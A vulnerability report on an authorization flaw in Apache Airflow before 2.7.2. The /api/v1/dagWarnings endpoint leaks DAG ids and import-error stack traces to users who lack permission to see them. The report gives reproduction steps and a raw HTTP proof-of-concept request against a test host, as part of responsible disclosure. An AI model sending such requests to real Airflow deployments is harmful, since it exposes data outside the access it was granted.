Apache Airflow, versions prior to 2.7.2, contains a security vulnerability that allows authenticated users of Airflow to list warnings for all DAGs, even if the user had no permission to see those DAGs. It would reveal the dag_ids and the stack-traces of import errors for those DAGs with import errors.

Steps to reproduce :

1. Here I create a role with very little permission. It only has read permissions for the DAG “example_setup_teardown_taskflow” and read warning permissions.
2. Assign the role to an account and log in.
3. Use burpsuite to send the following message, and you can see the warnings of other DAGs. (replaced with the session of the account)

GET /api/v1/dagWarnings HTTP/1.1
Host: testvul.com:8080
Accept: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
content-type: application/json
Referer: http://testvul.com:8080/dags/example_external_task_marker_parent/grid
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=6ba0ebcd-94b6-41e9-8143-2ada52d554b1.IGPZy1m5c8235p5r8qo4GhPl_YM
Connection: close
Content-Length: 0

{F2771429}

Security Advisory: https://lists.apache.org/thread/h5tvsvov8j55wojt5sojdprs05oby34d**Severity**: LowCredit: balis0ng

Impact

It allows authenticated users of Airflow to list warnings for all DAGs, even if the user had no permission to see those DAGs. It would reveal the dag_ids and the stack-traces of import errors for those DAGs with import errors.